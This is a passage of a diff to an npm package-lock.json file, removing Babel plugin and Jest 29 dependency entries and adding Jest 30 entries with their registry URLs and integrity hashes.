"sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.18.6" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.19.0" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } - } - }, - "@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" - } - }, - "@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", - "dev": true, - "requires": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" - } - }, - "@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.2.0" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } - } - }, - "@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - } - }, - "@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "dependencies": { + "@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" + "@jest/get-type": "30.0.1" } }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, "requires": { - "has-flag": "^4.0.0" + "@sinclair/typebox": "^0.34.0" } }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } - } - }, - "@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.25.16" - } - }, - "@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", - "dev": true, - "requires": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - }, - "dependencies": { - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", + "@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" } }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } + "ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", + "dev": true + }, + "expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", - "dev": true, - "requires": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": 